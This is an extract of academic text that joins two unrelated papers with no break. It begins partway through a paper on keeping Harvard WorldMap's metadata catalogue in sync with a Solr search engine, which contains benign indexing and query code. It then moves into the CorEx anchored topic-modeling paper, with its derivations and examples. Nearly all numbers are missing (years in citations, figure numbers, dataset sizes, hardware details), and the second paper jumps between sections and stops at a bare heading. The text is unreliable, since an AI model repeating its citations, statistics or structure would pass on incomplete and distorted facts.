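        cur.execute("SELECT id, title, abstract, date FROM layers WHERE id = %s", (layer_id,))
        layer_id, title, abstract, date = cur.fetchone()

    doc = {"id": layer_id, "title": title, "abstract": abstract, "layer_date": str(date)}

    # solr's update handler accepts a json array of documents; commit makes them searchable
    resp = requests.post(
        SOLR_UPDATE_URL,
        params={"commit": "true"},
        data=json.dumps([doc]),
        headers={"Content-Type": "application/json"},
    )
    resp.raise_for_status()
```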
hypermap is responsible for ensuring that the worldmap search engine, based on apache solr, and the worldmap catalogue rdbms, based on postgresql, are kept in sync. for example, when a worldmap user updates the metadata information for one layer from the worldmap metadata editing interface, that information is updated in the worldmap pycsw backend, which is based on the rdbms. as soon as this happens, a synchronization task is sent from hypermap to the task queue. the task is then processed by the task queue, and all of the metadata information for the layer is synced to the corresponding search engine document.
figure : metadata rdbms to search engine synchronization in harvard worldmap.
thanks to this synchronization mechanism, worldmap users can search the existing layers' metadata using a search engine rather than the ogc catalogue, enabling more flexible searches which filter on keywords, source, layer type, map extent and date range (corti & lewis, ). the results are returned by the search engine as a json response, and tabular as well as spatial views (based on spatial facets) are returned to the browser (fig. ).
worldmap improvements with the search engine
by pairing the csw catalogue with a search engine, the metadata search in the worldmap sdi yields several major benefits.
fast results
by having the metadata content indexed in a search engine, metadata are returned very rapidly to the client. because of its indexed-documents nature, a search engine is much faster at returning results than a relational database. therefore, using the search engine in the worldmap search client makes things much faster than using a csw catalogue based on an rdbms.
scalability
from a software engineering perspective, search engines are highly scalable and replicable, thanks to their shardable architecture. such systems are capable of providing interactive query access to collections of spatio-temporal objects containing billions of features (kakkar & lewis, ; kakkar et al., ).
clean api
queries to the search engine api tend to be much simpler than xml queries to the csw catalogue, especially when crafting advanced search requests (spatial, non-spatial, temporal, etc.). the same holds for output: the json output from the search engine api provides a more compact representation of search results, enabling better performance and making the output more readable (figs. and ).
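as an illustration of the 'clean api' point, a hedged sketch of a keyword, date-range and bounding-box query against a solr endpoint is shown below; the core name and the 'layer_date' and 'geom' field names are assumptions, not the actual hypermap schema.

```python
import requests

SOLR_SELECT_URL = "http://localhost:8983/solr/hypermap/select"  # illustrative core name

# keyword, temporal and spatial criteria expressed as plain query parameters
params = {
    "q": "flood",
    "fq": [
        "layer_date:[2010-01-01T00:00:00Z TO 2015-12-31T23:59:59Z]",
        "{!field f=geom}Intersects(ENVELOPE(-10, 30, 60, 35))",  # minX, maxX, maxY, minY
    ],
    "rows": 10,
    "wt": "json",
}

response = requests.get(SOLR_SELECT_URL, params=params)
for doc in response.json()["response"]["docs"]:
    print(doc.get("title"))
```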
synonyms, text stemming
crucially, search engines are good at handling the ambiguities of natural languages, thanks to stop words (words filtered out during the processing of text), stemming (the ability to detect words derived from a common root), synonym detection and controlled vocabularies such as thesauri and taxonomies. it is possible to do phrase searches and proximity searches (search for a phrase containing two different words separated by a specified number of words). because of features like these, keyword queries using the hypermap search engine endpoint typically return more results than an equivalent query using the hypermap csw. for example, doing a full text search for the keyword 'library' returns more results from the search engine because it includes variations and synonyms of the original term, like 'libraries,' 'bibliotheca,' 'repository,' and 'repositories,' in the returned results.
figure : csw request and response.
figure : search engine request and response.
relevancy
results can be ranked, providing a way to return results to users with the more relevant ones closer to the top. this is very useful for surfacing the most significant metadata for a given query. weights can be assigned by specifying boosts (weighted factors) for each field.
facets
another important search engine feature useful for searching the worldmap metadata catalogue is faceted search. faceting is the arrangement of search results in categories based on indexed terms. this capability makes it possible, for example, to provide an immediate indication of the number of times that common keywords are contained in different metadata documents. a typical use case is with metadata categories, keywords and regions. thanks to facets, the user interface of an sdi catalogue can display counts for documents by category, keyword or region (fig. ). search engines can also support temporal and spatial faceting, two features that are extremely useful for browsing large collections of geospatial metadata. temporal faceting can display the number of metadata documents by date range as a kind of histogram. spatial faceting can provide a spatial surface representing the distribution of layers or features across an area of interest: in fig. , a heatmap generated by spatial faceting shows the distribution of layers in the worldmap sdi for a given geographic region.
figure : facets generate counts for metadata categories and geographic regions in a geocms.
figure : spatial faceting enables heatmaps showing the distribution of the sdi layers in space.
other features
in addition, it is possible to use regular expressions, wildcard search and fuzzy search to provide results for a given term and its common variations. it is also possible to support boolean queries (a user is able to search using terms and boolean operators such as and, or, not), and hit highlighting can provide immediate search term suggestions to the user searching a text string in metadata.
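the faceted queries described above can be sketched as follows, assuming a solr backend; the 'category', 'regions', 'layer_date' and 'geom' field names are illustrative, not the actual worldmap schema.

```python
import requests

SOLR_SELECT_URL = "http://localhost:8983/solr/hypermap/select"  # illustrative core name

params = {
    "q": "*:*",
    "rows": 0,                                 # we only want the facet counts, not the documents
    "facet": "true",
    "facet.field": ["category", "regions"],    # counts per category and per region
    "facet.range": "layer_date",               # temporal faceting as a histogram
    "facet.range.start": "2000-01-01T00:00:00Z",
    "facet.range.end": "2018-01-01T00:00:00Z",
    "facet.range.gap": "+1YEAR",
    "facet.heatmap": "geom",                   # spatial faceting over a grid, rendered as a heatmap
    "wt": "json",
}

response = requests.get(SOLR_SELECT_URL, params=params).json()
print(response["facet_counts"]["facet_fields"]["category"])
```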
conclusion
while the csw . . standard provides improvements to address mass-market search/discovery, the benefits of search engine implementations, combined with the broad interoperability of the csw standard, present a great opportunity to enhance the csw standard. the authors hope that such an approach eventually becomes formalized as a csw application profile or best practice in order to achieve maximum benefit and adoption in sdi activities. this will allow csw implementations to make better use of search engine methodologies for improving the user search experience in sdi workflows. in addition, pycsw is planning dedicated elasticsearch/solr support as part of a future release to enable the use of search engines as backend stores to the csw standard. this is a different approach from using an application profile or best practice, as it directly interacts with data in the search engine rather than in the rdbms (fig. ).
figure : pycsw interaction with the search engine using an application profile and using a basic profile (when pycsw will provide direct support for the search engine).
the authors would like to share this work with the ogc csw community in support of the evolution of the csw specification. given recent developments on the ogc wfs . standard (restful design patterns, json, etc.), there is an opportunity for csw to evolve in alignment with wfs . in support of the principles of the w c spatial data on the web best practices (group, ) in a manner similar to the work presented in this paper.
acknowledgements
the authors thank all the contributors to the hypermap and geonode platform source code, particularly: wayner barrios, matt bertrand, simone dalmasso, alessio fabiani, jorge martínez gómez, wendy guan, jeffrey johnson, devika kakkar, jude mwenda, ariel núñez, luis pallares, david smiley, charles thao, angelos tzotsos, mingda zhang.
additional information and declarations
funding
this work is partially funded by the u.s. national endowment for the humanities, digital humanities implementation grant #hk , the u.s. national science foundation industry-university cooperative research centers program (iucrc) grant for the spatiotemporal thinking, computing, and applications center (stc) # , and by harvard university. grant administration was supported by harvard's institute for quantitative social science. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: u.s. national endowment for the humanities, digital humanities implementation: #hk . u.s. national science foundation industry-university cooperative research centers program (iucrc). spatiotemporal thinking, computing, and applications center (stc): # . harvard university. harvard's institute for quantitative social science.
competing interests
the authors declare that they have no competing interests.
author contributions
- paolo corti conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
- athanasios tom kralidis performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
- benjamin lewis performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
data availability
the following information was supplied regarding data availability: hypermap registry: https://github.com/cga-harvard/hypermap-registry
references
bone c, ager a, bunzel k, tierney l. a geospatial search engine for discovering multi-format geospatial data across the web. international journal of digital earth.
chen n, chen z, hu c, di l. a capability matching and ontology reasoning method for high precision ogc web service discovery. international journal of digital earth.
corti p, lewis b. making temporal search more central in spatial data infrastructures. in: isprs annals of photogrammetry, remote sensing and spatial information sciences. copernicus publications.
goodchild mf, fu p, rich p. sharing geographic information: an assessment of the geospatial one-stop. annals of the association of american geographers.
groot r, mclaughlin jd. geospatial data infrastructure: concepts, cases, and good practice. oxford: oxford university press.
group oww. spatial data on the web best practices. available at https://www.w .org/tr/sdw-bp/.
guan ww, bol pk, lewis bg, bertrand m, berman ml, blossom jc. worldmap—a geospatial framework for collaborative research. annals of gis.
iso - : . geographic information—metadata—part : fundamentals. geneva: international standards organisation.
kakkar d, lewis b. building a billion spatio-temporal object search and visualization platform. in: isprs annals of photogrammetry, remote sensing and spatial information sciences. copernicus publications.
kakkar d, lewis b, smiley d, nunez a. the billion object platform (bop): a system to lower barriers to support big, streaming, spatio-temporal data sources. free and open source software for geospatial (foss g) conference proceedings.
kralidis at. geospatial web services: the evolution of geospatial data infrastructure. in: the geospatial web. london: springer.
li w, yang c, yang c. an active crawler for discovering geospatial web services and their distribution pattern—a case study of ogc web map service. international journal of geographical information science.
masó j, pons x, zabala a. tuning the second-generation sdi: theoretical aspects and real use cases. international journal of geographical information science.
nebert dd.
developing spatial data infrastructures: the sdi cookbook. global spatial data infrastructure (gsdi) association. available at http://gsdiassociation.org/images/publications/cookbooks/sdi_cookbook_gsdi_ _ver .pdf.
nebert d, whiteside a, vretanos p. ogc catalogue services specification. open geospatial consortium inc. available at https://portal.opengeospatial.org/files/?artifact_id= .
nogueras-iso j, zarazaga-soria fj, muro-medrano pr. geographic information metadata for spatial data infrastructures: resources, interoperability and information retrieval. berlin, heidelberg: springer.
open geospatial consortium. catalogue service. available at http://www.opengeospatial.org/standards/cat/.
rajabifard a, kalantari m, binns a. sdi and metadata entry and updating tools. in: sdi convergence. available at https://minerva-access.unimelb.edu.au/bitstream/handle/ / / _sdiandmetadataentryandupdatingtool.pdf.
smiley d, pugh e, parisa k, mitchell m. apache solr enterprise search server. birmingham: packt publishing ltd.
tsinaraki c, schade s. big data—a step change for sdi? international journal.
anchored correlation explanation: topic modeling with minimal domain knowledge
ryan j. gallagher, kyle reing, david kale, and greg ver steeg
information sciences institute, university of southern california; vermont complex systems center, computational story lab, university of vermont
ryan.gallagher@uvm.edu {reing,kale,gregv}@isi.edu
abstract
while generative models such as latent dirichlet allocation (lda) have proven fruitful in topic modeling, they often require detailed assumptions and careful specification of hyperparameters. such model complexity issues only compound when trying to generalize generative models to incorporate human input. we introduce correlation explanation (corex), an alternative approach to topic modeling that does not assume an underlying generative model, and instead learns maximally informative topics through an information-theoretic framework. this framework naturally generalizes to hierarchical and semi-supervised extensions with no additional modeling assumptions. in particular, word-level domain knowledge can be flexibly incorporated within corex through anchor words, allowing topic separability and representation to be promoted with minimal human intervention. across a variety of datasets, metrics, and experiments, we demonstrate that corex produces topics that are comparable in quality to those produced by unsupervised and semi-supervised variants of lda.
introduction
the majority of topic modeling approaches utilize probabilistic generative models, models which specify mechanisms for how documents are written in order to infer latent topics.
these mechanisms may be explicitly stated, as in latent dirichlet allocation (lda) (blei et al., ), or implicitly stated, as with matrix factorization techniques (hofmann, ; ding et al., ; buntine and jakulin, ). the core generative mechanisms of lda, in particular, have inspired numerous generalizations that account for additional information, such as authorship (rosen-zvi et al., ), document labels (mcauliffe and blei, ), or hierarchical structure (griffiths et al., ). however, these generalizations come at the cost of increasingly elaborate and unwieldy generative assumptions. while these assumptions allow topic inference to be tractable in the face of additional metadata, they progressively constrain topics to a narrower view of what a topic can be. such assumptions are undesirable in contexts where one wishes to minimize model complexity and learn topics without preexisting notions of how those topics originated.
for these reasons, we propose topic modeling by way of correlation explanation (corex), an information-theoretic approach to learning latent topics over documents. unlike lda, corex does not assume a particular data generating model, and instead searches for topics that are "maximally informative" about a set of documents. by learning informative topics rather than generated topics, we avoid specifying the structure and nature of topics ahead of time. open source, documented code for the corex topic model is available at https://github.com/gregversteeg/corex_topic.
in addition, the lightweight framework underlying corex is versatile and naturally extends to hierarchical and semi-supervised variants with no additional modeling assumptions. more specifically, we may flexibly incorporate word-level domain knowledge within the corex topic model. topic models are often susceptible to portraying only dominant themes of documents. injecting a topic model, such as corex, with domain knowledge can help guide it towards otherwise underrepresented topics that are of importance to the user. by incorporating relevant domain words, we might encourage our topic model to recognize a rare disease that would otherwise be missed in clinical health notes, focus more attention on topics from news articles that can guide relief workers in distributing aid more effectively, or disambiguate aspects of a complex social issue.
our contributions are as follows: first, we frame corex as a topic model and derive an efficient alteration to the corex algorithm to exploit sparse data, such as word counts in documents, for dramatic speedups. second, we show how domain knowledge can be naturally integrated into corex through "anchor words" and the information bottleneck. third, we demonstrate that corex and anchored corex produce topics of comparable quality to unsupervised and semi-supervised variants of lda over several datasets and metrics. finally, we carefully detail several anchoring strategies that highlight the versatility of anchored corex on a variety of tasks.
methods
corex: correlation explanation
here we review the fundamentals of correlation explanation (corex), and adopt the notation used by ver steeg and galstyan in their original presentation of the model ( ).
let $X$ be a discrete random variable that takes on a finite number of values, indicated with lowercase $x$. furthermore, if we have $n$ such random variables, let $X_G$ denote a sub-collection of them, where $G \subseteq \{1, \ldots, n\}$. the probability of observing $X_G = x_G$ is written as $p(X_G = x_G)$, which is typically abbreviated to $p(x_G)$. the entropy of $X$ is written as $H(X)$, and the mutual information of two random variables $X_1$ and $X_2$ is given by $I(X_1 : X_2) = H(X_1) + H(X_2) - H(X_1, X_2)$.
the total correlation, or multivariate mutual information, of a group of random variables $X_G$ is expressed as
$$TC(X_G) = \sum_{i \in G} H(X_i) - H(X_G) \qquad (1)$$
$$TC(X_G) = D_{KL}\!\left( p(X_G) \,\Big\|\, \prod_{i \in G} p(X_i) \right). \qquad (2)$$
we see that eq. (1) does not quantify "correlation" in the modern sense of the word, and so it can be helpful to conceptualize total correlation as a measure of total dependence. indeed, eq. (2) shows that total correlation can be expressed using the kullback-leibler divergence and, therefore, it is zero if and only if the joint distribution of $X_G$ factorizes, or, in other words, there is no dependence between the random variables.
the total correlation can also be written conditioned on another random variable $Y$: $TC(X_G \mid Y) = \sum_{i \in G} H(X_i \mid Y) - H(X_G \mid Y)$. so, we can consider the reduction in total correlation when conditioning on $Y$:
$$TC(X_G ; Y) = TC(X_G) - TC(X_G \mid Y) \qquad (3)$$
$$TC(X_G ; Y) = \sum_{i \in G} I(X_i : Y) - I(X_G : Y). \qquad (4)$$
the quantity expressed in eq. (3) acts as a lower bound of $TC(X_G)$ (ver steeg and galstyan, ), as readily verified by noting that $TC(X_G)$ and $TC(X_G \mid Y)$ are always non-negative. also note that the joint distribution of $X_G$ factorizes conditional on $Y$ if and only if $TC(X_G \mid Y) = 0$. if this is the case, then $TC(X_G ; Y)$ is maximized, and $Y$ explains all of the dependencies in $X_G$.
in the context of topic modeling, $X_G$ represents a group of word types and $Y$ represents a topic to be learned. since we are always interested in grouping multiple sets of words into multiple topics, we will denote the binary latent topics as $Y_1, \ldots, Y_m$ and their corresponding groups of word types as $X_{G_j}$ for $j = 1, \ldots, m$ respectively. the corex topic model seeks to maximally explain the dependencies of words in documents through latent topics by maximizing $TC(X ; Y_1, \ldots, Y_m)$. to do this, we maximize the following lower bound on this expression:
$$\max_{G_j,\, p(y_j \mid x_{G_j})} \; \sum_{j=1}^{m} TC(X_{G_j} ; Y_j). \qquad (5)$$
as we describe in the following section, this objective can be efficiently approximated, despite the search occurring over an exponentially large probability space (ver steeg and galstyan, ). since each topic explains a certain portion of the overall total correlation, we may choose the number of topics by observing diminishing returns to the objective. furthermore, since the corex implementation depends on a random initialization (as described shortly), one may restart the corex topic model several times and choose the run that explains the most total correlation.
the latent factors $Y_j$ are optimized to be informative about dependencies in the data and do not require generative modeling assumptions. note that the discovered factors $Y$ can be used as inputs to construct new latent factors $Z$, and so on, leading to a hierarchy of topics. although this extension is quite natural, we focus our analysis on the first level of topic representations for easier interpretation and evaluation.
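as a small illustration of these quantities, the following self-contained numpy sketch estimates total correlation and its reduction under conditioning for a toy set of binary variables; it is only meant to make eqs. (1) and (3) concrete, not to reproduce the corex optimization.

```python
import numpy as np
from collections import Counter

def entropy(samples):
    """empirical shannon entropy (in nats) of the rows of a 2-d array."""
    counts = Counter(map(tuple, samples))
    p = np.array(list(counts.values()), dtype=float) / len(samples)
    return -np.sum(p * np.log(p))

def total_correlation(X):
    """eq. (1): TC(X_G) = sum_i H(X_i) - H(X_G), estimated from samples."""
    return sum(entropy(X[:, [i]]) for i in range(X.shape[1])) - entropy(X)

def conditional_tc(X, y):
    """TC(X_G | Y): within-group total correlation averaged over the values of a binary y."""
    return sum(np.mean(y == v) * total_correlation(X[y == v]) for v in np.unique(y))

rng = np.random.default_rng(0)
y = rng.integers(0, 2, size=5000)                                         # latent binary factor
X = np.column_stack([y ^ (rng.random(5000) < 0.1) for _ in range(3)])     # noisy copies of y

tc = total_correlation(X)
tc_given_y = conditional_tc(X, y)
print(tc, tc - tc_given_y)   # eq. (3): TC(X_G; Y) = TC(X_G) - TC(X_G | Y), close to tc here
```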
corex implementation
we summarize the implementation of corex as presented by ver steeg and galstyan ( ) in preparation for innovations introduced in the subsequent sections. the numerical optimization for corex begins with a random initialization of parameters and then proceeds via an iterative update scheme similar to em. for computational tractability, we subject the optimization in eq. (5) to the constraint that the groups $G_j$ do not overlap, i.e., we enforce single membership of words within topics. the optimization entails a combinatorial search over groups, so instead we look for a form that is more amenable to smooth optimization. we rewrite the objective using the alternate form in eq. (4) while introducing indicator variables $\alpha_{i,j}$ which are equal to 1 if and only if word $X_i$ appears in topic $Y_j$ (i.e., $i \in G_j$):
$$\max_{\alpha_{i,j},\, p(y_j \mid x)} \; \sum_{j=1}^{m} \left( \sum_{i=1}^{n} \alpha_{i,j}\, I(X_i : Y_j) - I(X : Y_j) \right) \quad \text{s.t.} \quad \alpha_{i,j} = \mathbb{I}\big[\, j = \arg\max_{\bar{j}} I(X_i : Y_{\bar{j}}) \,\big]. \qquad (6)$$
note that the constraint on non-overlapping groups now becomes a constraint on $\alpha$. to make the optimization smooth we relax the constraint so that $\alpha_{i,j} \in [0, 1]$. to do so, we replace the constraint with a softmax function; the update for $\alpha$ at iteration $t$ becomes
$$\alpha^t_{i,j} = \exp\Big( \lambda_t \big( I(X_i : Y_j) - \max_{\bar{j}} I(X_i : Y_{\bar{j}}) \big) \Big).$$
now $\alpha_{i,j} \in [0, 1]$ and the parameter $\lambda$ controls the sharpness of the softmax function. early in the optimization we use a small value of $\lambda$, then increase it later in the optimization to enforce a hard constraint. the objective in eq. (6) only lower bounds total correlation in the hard-max limit. the constraint on $\alpha$ forces competition among latent factors to explain certain words, while setting $\lambda = 0$ results in all factors learning the same thing.
holding $\alpha$ fixed, taking the derivative of the objective with respect to the variables $p(y_j \mid x)$, and setting it equal to zero leads to a fixed point equation. we use this fixed point to define update equations at iteration $t$:
$$p_t(y_j) = \sum_{\bar{x}} p_t(y_j \mid \bar{x})\, p(\bar{x}), \qquad p_t(x_i \mid y_j) = \sum_{\bar{x}} p_t(y_j \mid \bar{x})\, p(\bar{x})\, \mathbb{I}[\bar{x}_i = x_i] \,/\, p_t(y_j), \qquad (7)$$
$$\log p_{t+1}(y_j \mid x^\ell) = \log p_t(y_j) + \sum_{i=1}^{n} \alpha^t_{i,j} \log \frac{p_t(x^\ell_i \mid y_j)}{p(x^\ell_i)} - \log Z_j(x^\ell). \qquad (8)$$
the first two expressions just define the marginals in terms of the optimization parameter $p_t(y_j \mid x)$. we take $p(x)$ to be the empirical distribution defined by some observed samples $x^\ell$, $\ell = 1, \ldots, N$. the third expression updates $p_t(y_j \mid x^\ell)$, the probabilistic labels for each latent factor $Y_j$, for a given sample $x^\ell$. note that an easily calculated constant, $Z_j(x^\ell)$, appears to ensure the normalization of $p_t(y_j \mid x^\ell)$ for each sample. we iterate through these updates until convergence.
after convergence, we use the mutual information terms $I(X_i : Y_j)$ to rank which words are most informative for each factor. the objective is a sum of terms for each latent factor, and this allows us to rank the contribution of each factor toward our lower bound on the total correlation. the expected log of the normalization constant, often called the free energy, $\mathbb{E}[\log Z_j(X)]$, plays an important role since it provides a free estimate of the corresponding term in the objective (ver steeg and galstyan, ), as can be seen by taking the expectation of eq. (8) at convergence and comparing it to eq. (6). because our sample estimate of the objective is just the mean of contributions from individual sample points $x^\ell$, we refer to $\log Z_j(x^\ell)$ as the pointwise total correlation explained by factor $j$ for sample $\ell$. pointwise tc can be used to localize which samples are particularly informative about specific latent factors.
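a minimal numpy sketch of the soft competition step just described is shown below: given a matrix of current mutual-information estimates between words and factors, it computes the relaxed $\alpha$. this illustrates the update rule only, not the full iterative implementation.

```python
import numpy as np

def update_alpha(mi, lam):
    """relaxed competition among factors: alpha_{i,j} = exp(lam * (I(X_i:Y_j) - max_j I(X_i:Y_j)))."""
    # mi has shape (n_words, n_factors); each word's best factor gets alpha = 1,
    # the others are exponentially suppressed, with lam controlling the sharpness
    return np.exp(lam * (mi - mi.max(axis=1, keepdims=True)))

mi = np.array([[0.30, 0.05], [0.02, 0.20]])    # toy word-by-factor mutual informations
print(update_alpha(mi, lam=5.0))                # soft assignment early in training
print(update_alpha(mi, lam=100.0))              # approaches the hard argmax constraint
```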
sparsity optimization
derivation
to alter the corex optimization procedure to exploit sparsity in the data, we now assume that all variables $X_i, Y_j$ are binary and $x$ is a binary vector where $x^\ell_i = 1$ if word $i$ occurs in document $\ell$ and $x^\ell_i = 0$ otherwise. since all variables are binary, the marginal distribution $p(x_i \mid y_j)$ is just a two-by-two table of probabilities and can be estimated efficiently. the time-consuming part of training is the subsequent update of the document labels in eq. (8) for each document $\ell$. the computation of the log likelihood ratio for all $n$ words over all documents is not efficient, as most words do not appear in a given document. we therefore rewrite the logarithm in the interior of the sum:
$$\log \frac{p_t(x^\ell_i \mid y_j)}{p(x^\ell_i)} = \log \frac{p_t(x_i = 0 \mid y_j)}{p(x_i = 0)} + x^\ell_i \log\!\left( \frac{p_t(x^\ell_i = 1 \mid y_j)\, p(x_i = 0)}{p_t(x_i = 0 \mid y_j)\, p(x^\ell_i = 1)} \right). \qquad (9)$$
note that when the word does not appear in the document, only the leading term of eq. (9) is nonzero. however, when the word does appear, everything but $\log p_t(x^\ell_i = 1 \mid y_j)/p(x^\ell_i = 1)$ cancels out. so, we have taken advantage of the fact that the corex topic model binarizes documents to assume by default that a word does not appear in the document, and then correct the contribution to the update if the word does appear. thus, when substituting back into the label update of eq. (8), the sum becomes a matrix multiplication between a sparse matrix of word occurrences $x^\ell_i$ (documents by word types) and a dense matrix (word types by latent factors). given $n$ variables, $N$ samples, and $\rho$ nonzero entries in the data matrix, the asymptotic scaling for corex goes from $O(nN)$ to $O(n) + O(N) + O(\rho)$ when exploiting sparsity. latent tree modeling approaches are quadratic in $n$ or worse, so we expect corex's computational advantage to increase for larger datasets.
figure : speed comparisons to a fixed number of iterations as the number of documents and words vary (panels: disaster relief articles, new york times, pubmed; y-axes: time in seconds; x-axes: number of docs with words fixed, and number of words with documents fixed; series: corex, sparse corex, lda). new york times articles and pubmed abstracts were collected from the uci machine learning repository (lichman, ). the disaster relief articles are described in section . , and are represented simply as bags of words, not phrases.
optimization evaluation
we perform experiments comparing the running time of corex before and after implementing the improvements which exploit sparsity. we also compare with scikit-learn's simple batch implementation of lda using the variational bayes algorithm (hoffman et al., ). experiments were performed on a four-core intel i chip running at ghz with gb ram. we show run time when varying the data size in terms of the number of word types and the number of documents. we used topics for all runs and set the number of iterations for each run to iterations for lda and iterations for corex. results are shown in figure . we see that corex exploiting sparsity is orders of magnitude faster than the naive version and is generally comparable to lda as the number of documents scales. the slope on the log-log plot suggests a linear dependence of running time on the dataset size, as expected.
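the sparse update described above can be pictured with scipy as below: a sparse document-word matrix multiplied by a dense word-by-factor matrix of per-word log-ratio corrections, plus a document-independent base term. this is a schematic of the bookkeeping only, with made-up shapes and values, not the library's actual code.

```python
import numpy as np
from scipy import sparse

n_docs, n_words, n_factors = 10_000, 5_000, 50
rng = np.random.default_rng(0)

# binary document-word matrix; most entries are zero, so it is stored sparsely
doc_word = sparse.random(n_docs, n_words, density=0.002, format="csr", dtype=np.float64)
doc_word.data[:] = 1.0

# per-word, per-factor terms of the label update:
# 'base' is the contribution assumed for absent words, 'correction' is added only when a word occurs
base = rng.normal(size=(n_words, n_factors))
correction = rng.normal(size=(n_words, n_factors))

# document-by-factor log contributions: roughly O(n) + O(N) + O(nnz) work overall
log_update = base.sum(axis=0)[np.newaxis, :] + doc_word @ correction
print(log_update.shape)   # (10000, 50)
```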
anchor words via the bottleneck
the information bottleneck formulates a trade-off between compressing data $X$ into a representation $Y$, and preserving the information in $X$ that is relevant to $Z$ (typically labels in a supervised learning task) (tishby et al., ; friedman et al., ). more formally, the information bottleneck is expressed as
$$\max_{p(y \mid x)} \; \beta I(Z : Y) - I(X : Y), \qquad (10)$$
where $\beta$ is a parameter controlling the trade-off between compressing $X$ and preserving information about the relevance variable $Z$.
to see the connection with corex, we compare the corex objective as written in eq. (6) with the bottleneck in eq. (10). we see that we have exactly the same compression term for each latent factor, $I(X : Y_j)$, but the relevance variables now correspond to $Z \equiv X_i$. if we want to learn representations that are more relevant to specific keywords, we can simply anchor a word type $X_i$ to topic $Y_j$ by constraining our optimization so that $\alpha_{i,j} = \beta_{i,j}$, where $\beta_{i,j}$ controls the anchor strength. otherwise, the updates on $\alpha$ remain the same. this schema is a natural extension of the corex optimization and it is flexible, allowing for multiple word types to be anchored to one topic, for one word type to be anchored to multiple topics, or for any combination of these semi-supervised anchoring strategies.
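assuming the interface of the open-source corextopic package referenced earlier (the pip-installable companion to https://github.com/gregversteeg/corex_topic), anchored topics can be requested roughly as follows; the documents, anchor words and anchor strength here are illustrative, not drawn from the paper's experiments.

```python
from sklearn.feature_extraction.text import CountVectorizer
from corextopic import corextopic as ct

docs = [
    "flooding along the river displaced thousands of families",
    "the clinic treated patients for fever and dehydration",
    "rebel forces shelled the town with heavy weapons",
]

# binary document-word matrix, as the corex topic model expects
vectorizer = CountVectorizer(binary=True)
X = vectorizer.fit_transform(docs)
words = list(vectorizer.get_feature_names_out())

# anchor one word list to topic 0 and another to topic 1; anchor_strength plays the role of beta
model = ct.Corex(n_hidden=2, seed=0)
model.fit(X, words=words, anchors=[["flooding", "river"], ["clinic", "fever"]], anchor_strength=3)

for topic_idx in range(2):
    # get_topics returns the most informative words for each latent factor
    print(topic_idx, [t[0] for t in model.get_topics(topic=topic_idx)])
```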
related work
with respect to integrating domain knowledge into topic models, we draw inspiration from arora et al. ( ), who used anchor words in the context of non-negative matrix factorization. under an assumption of separability, these anchor words act as high-precision markers of particular topics and, thus, help discern the topics from one another. although the original algorithm proposed by arora et al. ( ), and subsequent improvements to their approach, find these anchor words automatically (arora et al., ; lee and mimno, ), recent adaptations allow manual insertion of anchor words and other metadata (nguyen et al., ; nguyen et al., ). our work is similar to the latter, in that we treat anchor words as fuzzy logic markers and embed them into the topic model in a semi-supervised fashion. in this sense, our work is closest to halpern et al. ( ; ), who have also made use of domain expertise and semi-supervised anchored words in devising topic models.
there is an adjacent line of work that has focused on incorporating word-level information into lda-based models. jagarlamudi et al. ( ) proposed seededlda, a model that seeds words into given topics and guides, but does not force, these topics towards the integrated words. andrzejewski and zhu ( ) presented a model that makes use of "z-labels," words that are known to pertain to specific topics and that are restricted to appearing in some subset of all the possible topics. although the z-labels can be leveraged to place different senses of a word into different topics, it requires additional effort to determine when these different senses occur. our anchoring approach allows a user to more easily anchor one word to multiple topics, allowing corex to naturally find topics that revolve around different senses of a word.
andrzejewski et al. ( ) presented a second model which allows the specification of must-link and cannot-link relationships between words that help partition otherwise muddled topics. these logical constraints help enforce topic separability, though they less directly address how to anchor a single word or set of words to help a topic emerge. more generally, the must/cannot-link and z-label topic models have been expressed in a powerful first-order-logic framework that allows the specification of arbitrary domain knowledge through logical rules (andrzejewski et al., ). others have built off this first-order-logic approach to automatically learn rule weights (mei et al., ) and incorporate additional latent variable information (foulds et al., ).
mathematically, corex topic models most closely resemble topic models based on latent tree reconstruction (chen et al., ). in chen et al.'s ( ) analysis, their own latent tree approach and corex both report significantly better perplexity than hierarchical topic models based on the hierarchical dirichlet process and the chinese restaurant process. corex has also been investigated as a way to find "surprising" documents (hodas et al., ).
data and evaluation methods
data
we use two challenging datasets with corresponding domain-knowledge lexicons to evaluate anchored corex. our first dataset consists of , humanitarian assistance and disaster relief (ha/dr) articles covering disaster types, collected from reliefweb, an ha/dr news article aggregator sponsored by the united nations. to mitigate overwhelming label imbalances during anchoring, we both restrict ourselves to documents in english with one label, and randomly subsample , articles from each of the largest disaster type labels. this leaves us with a corpus of , articles. the ha/dr articles and accompanying lexicon are available at http://dx.doi.org/ . /dvn/tgopru.
we accompany these articles with an ha/dr lexicon of approximately , words and phrases. the lexicon was curated by first gathering – seed terms per disaster type from ha/dr domain experts and crisislex. this term list was then expanded by creating word embeddings for each disaster type, and taking terms within a specified cosine similarity of the seed words. these lists were then filtered by removing names, places, non-ascii characters, and terms with fewer than three characters. finally, the extracted terms were audited using crowdflower, where users rated the relevance of the terms on a likert scale. low relevance terms were dropped from the lexicon. of these terms, , types appear in the ha/dr articles.
our second dataset consists of , deidentified clinical discharge summaries from the informatics for integrating biology and the bedside (i b ) obesity challenge (data available upon data use agreement at https://www.i b .org/nlp/obesity/). these summaries are labeled by clinical experts with conditions frequently associated with obesity. for these documents, we leverage a text pipeline that extracts common medical terms and phrases (dai et al., ; chapman et al., ), which yields , such term types. for both sets of documents, we use their respective lexicons to break the documents down into bags of words and phrases. we also make use of the newsgroups dataset, as provided and preprocessed in the scikit-learn library (pedregosa et al., ).
we also evaluate the models in terms of multi-class logistic regression document classification (pedregosa et al., ), where the feature set of each document is its topic distribution. we perform all document classification tasks using a / training-test split.

finally, we measure how well each topic model does at clustering documents. we obtain a clustering by assigning each document to the topic that occurs with the highest probability. we then measure the quality within clusters (homogeneity) and across clusters (adjusted mutual information). the highest possible value for both measures is one. we do not report clustering metrics on the clinical health notes because the documents are multi-label and, in that case, the metrics are not well-defined.

. choosing anchor words

